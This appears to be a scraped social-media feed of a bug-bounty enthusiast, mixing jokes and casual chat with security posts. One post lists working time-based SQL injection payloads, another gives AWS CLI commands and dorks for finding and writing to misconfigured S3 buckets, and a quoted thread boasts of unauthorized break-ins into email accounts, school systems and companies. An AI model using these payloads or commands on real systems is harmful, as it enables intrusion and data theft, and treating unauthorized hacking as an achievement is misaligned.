RAMAN RAJ 🇮🇳

This genuinely made me laugh 😂 I feel slightly amount of outrage like #Google wants to ask me " how dare you human even assume that i am down ".

@elonmusk Feed is full of Post where people asks Ai to remove a person from an image and I am not even following them. And not getting tweets of accounts I follow.

We know the algorithm is dumb and needs massive improvements, but at least you can see us struggle to make it better in real-time and with transparency. No other social media companies do this.

India has no contribution to global software Bro, your fav companies run on: – Postman → Microsoft, PayPal, 98% of Fortune 500 – Zoho → Nike, Cisco, Airbnb – Freshworks → American Express, AWS, McLaren F1 – Finacle → ICICI, India Post – TCS BaNCS → MUFG, Citi, Deutsche Bank Keep saying “India has no software contribution” while your APIs, banks, and CRMs literally run on it 😂

Programming language you learnd but never used again is...?

@gabbytech01 Bug bounty and Penetration testing are two child of the same parents. In which penetration testing is the privileged one.

Bug Bounty Hunting and Penetration Testing are the same :)

My favorite SQL injection payloads: - 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' - ')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/# - 1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)' I collected these from HackerOne reports.

@SecurityTrybe @X

Hi @X I'm looking to Connect with people who are interested in: 🔒 Cybersecurity 🕵️‍♂️ Ethical Hacking 🔐 Network Security 🛡️ Penetration Testing 📊 Security Analytics 👨‍💻 Cyber Forensics 📚 Cybersecurity Research 🚨 Risk Management 🧑‍💻 Secure Coding 🪲Bug Bounty Drop a hi and let’s connect

@SecurityTrybe Pin/password >>>>>>>> FaceId/TouchId

Which one is more secure??

@immunefi at BSides Ahmedabad

@SecurityTrybe 042

Can you get the 3 digit key?

@vaishnavi9170 @x_deepdarshan21

I need a boyfriend, anyone ?

@KevinSzabo14 Sugarcane juice 🥤

Besides water. What is the best thing to drink?

@laveenahere By watching more reels.

🔓 Abusing AWS S3 Bucket Permissions 👇 AWS S3 buckets are popular targets for hackers due to potential misconfigurations and improper access control. Let's dive into the techniques attackers use to identify and exploit vulnerable S3 buckets! 1️⃣ Bucket Recon: Spot S3 buckets URLs via source code inspection (HTML & JS files), brute-forcing, Google dorking (site:s3.amazonaws.com "company_name"), DNS caching, or reverse IP lookups. 2️⃣ Permission Testing: Use AWS CLI to test permissions. For read (aws s3 ls s3://[bucket-name] --no-sign-request) and write (aws s3 cp localfile.txt s3://[bucket-name] --no-sign-request). 3️⃣ ACL Exploration: Retrieve bucket/object ACLs (aws s3api get-bucket-acl --bucket [name]) and test WRITE_ACP by attempting to set new ACLs. 4️⃣ Full Control Abuse: Look for FULL_CONTROL permissions to read, write, and modify ACLs. Exploit any authenticated AWS client access by using your AWS profile in the CLI commands. 5️⃣ Policy Misconfigurations: Identify overly permissive policies (e.g., Action set to "*") and recommend granular, need-based permissions. By trying out these tricks, you may be able to effectively identify and report misconfigured S3 buckets, helping organizations secure their sensitive data in the cloud! #BugBounty #YesWeRHackers #BugBountyTips

@OngDevLab Cyber security

What does CS stand for? Wrong answers only:

@gowtham_ponnana Really inspiring.

Some People Said, "You're too young to achieve this". But they never saw the story behind. It's been 7055 days since I was born. And I always wonder what I've done so far. Because I always feel there's something I still need to do and this is the only thing that keeps pushing me forward. This is not something I wanted to show, but just felt like writing it out. Because people always assume that mine is pure luck. Here it is, how all it started back in my 8th grade[Year: 2018] Backstory: Me and my brother used to play @ClashofClans so heavily(kinda addicted) and I shared my gmail account to some unknown friend of mine so that he can continue playing this game as I need to prepare for the exams. And as expected, he changed the password, thus leading me here. Age 12: Started Learning about #Hacking Age 13: Wrote first “Hello World” program in C. Age 14: Hacked into my Computer Teacher’s gmail account. Age 14: Won 2nd Prize at Science Fair competition for “Hacking Project: Social Engineering” Age 15: Hacked into India’s Top School systems exposing over 30L+ student details. Age 15: Failed #CEH (Cried a lot lol 😂) Age 15: Started doing #bugbounties Age 16: Moved out of my hometown for better opportunities. (Also education) Age 16: Passed #PNPT but didn’t get certified due to some reasons. (Got banned) Age 16: earned my first $XXXX bounty Age 17: Slowly started focusing in Web3 Age 17: Made my first $10,000+ via Bug Bounties in almost a year. [Thanks to @immunefi & @HackenProof ] Age 17: Got my First Job [ Quick story: hacked into the company —> reported to the COO @rahulparikh94 —> COO offered a job if what I'm claiming is real and asked to prove it in-front of the tech team —> Done —> Joined the Company ] Age 17: Top Researcher of Hackenproof @2022 Age 18: Hacked into a “Hacking Company” - Top #Web3 Security Firm Age 18: Found a critical bug at Crypto-Exchange, securing over $400m-$500m in value. [ CVSS: 10.0 ] Age 18: Gave First Talk at @nullhyd Age 18: Hacked into Two Biggest E-Commerce Companies which are making a yearly turnover of around $10,00,000+ each. [Update: Sealed a private auditing deal with one of the company and working as security advisor & closely in talk in another company for better relationships] Age 19: Gave Talk at DEFCON Delhi(@dc_9111 ) on Web3 Security Age 19: Joined @TECHFUND as Security Researcher [Web3] Age 19: Gave Talk at Lovely Professional University on Web3 & Web3 Security And still a lot to do more. Should really thank to all the people who supported me right from the beginning i.e from my parents, teachers & friends to all the executives ie. COOs, CEOs, Employees that I've worked with and special thanks to my first mentor @nullshock1 for your early support and current mentors @0xSmit @RealJohnnyTime @MitchellAmador @0xrudrapratap and others for your constant support and guidance. More importantly, I'm blessed to have some real friends like @LexiLominite @IamRenganathan @cyberzyro1 @BhalgamaVedant who sticked with me right from the beginning. Love you guys! [NOTE]: There are still lots of people to whom I owe for their support throughout. I'll always strive to give my very best in whatever way I can. Regards, Gowtham Naidu Ponnana #infosec

@bugbounty_memes 3) Dom manipulation.

@bugbounty_memes 1) sensitive api key hardcoded in js files. 2) any sensitive network services may be open on the server.

@ADITYASHENDE17 I have hacked into my phone number and it is not working but I am not able to join the meeting and I am not able to join the meeting...

Type “I have hacked into…” let the keyboard type remaining #cybersecurity

@i05Prashant The only special thing is you live in your home with your family. You don't need to relocate to any rushed city.

Why do you need a remote job? What's so special?

🤣🤣🤣🤣🤣 #bugbounty #hacking